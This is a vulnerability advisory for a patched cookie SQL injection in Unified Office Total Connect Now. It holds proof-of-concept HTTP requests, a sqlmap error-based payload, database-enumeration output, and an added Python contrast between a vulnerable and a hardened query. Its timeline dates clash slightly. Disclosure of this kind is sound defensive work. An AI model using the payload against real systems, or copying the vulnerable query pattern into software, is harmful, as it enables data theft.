Unified Office Total Connect Now Cookie Parameter SQL Injection

1. Advisory Information 

Title: Unified Office Total Connect Now℠ Cookie Parameter SQL Injection 
Advisory ID: CORE-2022-0001 
Advisory URL:  https://www.coresecurity.com/core-labs/advisories/unified-office-total-connect-sql-injection 
Date published: 2022-02-01 
Date of last update: 2022-02-01  
Vendors contacted: Unified Office 
Release mode: Coordinated release 

2. Vulnerability Information 

Class: CWE-565: Reliance on Cookies without Validation and Integrity Checking [CWE-565]
Impact: Code execution 
Remotely Exploitable: Yes 
Locally Exploitable: Yes 
CVE Name: CVE-2022-24121

3. Vulnerability Description 

Unified Office, Inc.[1] is a technology company located in Nashua, New Hampshire that provides SDN-based hybrid cloud managed Voice-over-IP (VoIP) and Unified Communications services to Small and Medium-sized Businesses (SMBs).

Their solution, Total Connect Now℠, centralizes communications, enabling users to access business voice services such as auto-attendant, voicemail, conferencing, and park/pickup from any device.

A vulnerability was found in Unified Office Total Connect Now that would allow an attacker to extract sensitive information through a Cookie Parameter SQL Injection. 

4. Vulnerable Packages 

  • Unified Office Total Connect Now running on CentOS (Linux CentOS 6, PHP 5.3.10, Apache 2.2.15, MySQL >= 5.0.0)
  • Other products and versions might be affected but have not yet been tested. 

5. Vendor Information, Solutions and Workarounds 

Vendor has implemented input sanitizing which verifies that the injected information is a valid cookie. All affected systems have been patched. 

6. Credits 

This vulnerability was discovered and researched by Michael Clark from the DDI NIRV Team. The publication of this advisory was coordinated by Pablo A. Zurro from the Core Advisories Team. 

7. Technical Description / Proof of Concept Code

NIRV found the vulnerability titled Cookie Parameter SQL Injection (Frontline ID 104772) and determined the “authtoken” parameter was vulnerable. The default cookie parameter is “PHPSESSID” as shown below. 

GET / HTTP/1.1 
Host: 10.1.1.5:2080 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Connection: close 
Cookie: PHPSESSID=5df5ces6em5dcnegqknfenknu1 
Upgrade-Insecure-Requests: 1 
Cache-Control: max-age=0   

The “PHPSESSID” cookie can be removed and the cookies “authtoken=deleted;expires=Thu,01-Jan-197000:00:01GMT” added in its place, as shown below, together with the SQL error message returned when the “authtoken” value is changed to a single quote ('). 

GET / HTTP/1.1 
Host: 10.1.1.5:2080 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Connection: close 
Cookie: authtoken=';expires=Thu,01-Jan-197000:00:01GMT 
Upgrade-Insecure-Requests: 1 
Cache-Control: max-age=0 

HTTP/1.1 400 Bad Request 
Date: Wed, 01 Sep 2021 21:04:28 GMT 
Server: Apache/2.2.15 (CentOS) 
X-Powered-By: PHP/5.3.10 
Set-Cookie: PHPSESSID=6odo2345h2f6i703s49r432ad3; path=/ 
Expires: Thu, 19 Nov 1981 08:52:00 GMT 
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 
Pragma: no-cache 
Content-Length: 228 
Connection: close 
Content-Type: text/html; charset=UTF-8 

Query /select * from authtokens where token=''' / failed, called from: unknown:
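The failed query above shows the cookie value being spliced straight into the SQL text, and section 5 notes that the vendor's fix was to verify that the cookie is a valid token before using it. The following is an added example, not code from this advisory or from Unified Office, that reproduces the same query shape in Python with an in-memory SQLite database standing in for the PHP/MySQL application, beside a hardened lookup that validates the token format and binds it as a query parameter. The table columns, the token regular expression and the sample row are assumptions constructed for this example; only the table name and the session id value come from the advisory.

```python
import re
import sqlite3

# Constructed sample schema: the table name matches the advisory's error
# message, the column set is an assumption for this example.
SCHEMA = """
CREATE TABLE authtokens (token TEXT PRIMARY KEY, username TEXT NOT NULL);
INSERT INTO authtokens VALUES ('5df5ces6em5dcnegqknfenknu1', 'alice');
"""

# The PHPSESSID value shown in the advisory is lowercase alphanumeric;
# the length bound here is an assumption chosen for this example.
TOKEN_RE = re.compile(r"^[a-z0-9]{20,40}$")


def open_db():
    """Create the constructed in-memory database with one sample token."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, cookie_token):
    """Vulnerable pattern: the raw cookie value is concatenated into the SQL
    string, which is the query shape the advisory's error message reveals.
    A single quote in the cookie makes the statement fail to parse."""
    sql = "select * from authtokens where token='%s'" % cookie_token
    return conn.execute(sql).fetchone()


def lookup_hardened(conn, cookie_token):
    """Hardened pattern: reject anything that is not a well-formed token
    before it reaches the database, then bind the value as a parameter so
    the database never interprets it as SQL."""
    if not isinstance(cookie_token, str) or not TOKEN_RE.match(cookie_token):
        return None
    sql = "select username from authtokens where token = ?"
    row = conn.execute(sql, (cookie_token,)).fetchone()
    return row[0] if row else None


def demo():
    """Run both lookups against the valid token and against the single-quote
    value from the advisory, returning what each one does."""
    conn = open_db()
    results = {}
    results["vuln_valid"] = lookup_vulnerable(conn, "5df5ces6em5dcnegqknfenknu1")[1]
    try:
        lookup_vulnerable(conn, "'")
        results["vuln_quote"] = "no error"
    except sqlite3.OperationalError as exc:
        # Mirrors the application's "Query ... failed" behaviour
        results["vuln_quote"] = "query failed: %s" % exc
    results["hard_valid"] = lookup_hardened(conn, "5df5ces6em5dcnegqknfenknu1")
    results["hard_quote"] = lookup_hardened(conn, "'")
    results["hard_deleted"] = lookup_hardened(conn, "deleted")
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print("%-13s %s" % (name, value))
```

The validation step is what turns the database error into an early rejection: a malformed token never reaches the query, and the parameter binding protects the lookup even if the format check is later loosened.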

Sqlmap can be used to further exploit the injection.  

sqlmap injection point(s): 

--- 

Parameter: Cookie #1* ((custom) HEADER)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: authtoken=' AND (SELECT 3428 FROM(SELECT COUNT(*),CONCAT(0x716b767871,(SELECT (ELT(3428=3428,1))),0x716b6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ngCY;expires=Thu,01-Jan-197000:00:01GMT

Request sent via sqlmap: 

GET / HTTP/1.1  
Host: 10.1.1.5:2080  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: authtoken=*;expires=Thu,01-Jan-197000:00:01GMT  
Upgrade-Insecure-Requests: 1  
Cache-Control: max-age=0  

The same application was also running on port 443 on this host, and it was also vulnerable. The request sent via sqlmap is shown below: 

GET / HTTP/1.1  
Host: 10.1.1.5:443  
Cookie: authtoken=*;expires=Thu,01-Jan-197000:00:01GMT  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Upgrade-Insecure-Requests: 1  
Cache-Control: max-age=0  
Te: trailers  
Connection: close  

Databases available: 

[16:05:53] [INFO] the back-end DBMS is MySQL  
web server operating system: Linux CentOS 6  
web application technology: PHP 5.3.10, Apache 2.2.15, PHP  
back-end DBMS: MySQL >= 5.0.0  
[16:05:53] [INFO] fetching database names  
available databases [23]:  
asterisk  
[image: remaining database names redacted]

8. Report Timeline 

  • 2021-09-01 Vulnerability is discovered by NIRV. 
  • 2021-10-01 Vulnerability reported to Unified Office. 
  • 2021-12-14 Vulnerability patch tested. 
  • 2021-12-10 Patch released to every customer. 
  • 2022-02-01 Coordinated advisory is released. 

9. References 

[1] https://unifiedoffice.com/total-connect-now/ 

10. About CoreLabs 

CoreLabs, the research center of Core Security, by Fortra, is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team comprises seasoned researchers who regularly discover and disclose vulnerabilities, informing product owners so that a fix can be released efficiently and customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at https://www.coresecurity.com/core-labs. 

11. About Core Security 

Core Security, by Fortra, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [email protected].

12. Disclaimer 

The contents of this advisory are copyright (c) 2021 Core Security and (c) 2021 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License:  http://creativecommons.org/licenses/by-nc-sa/3.0/us/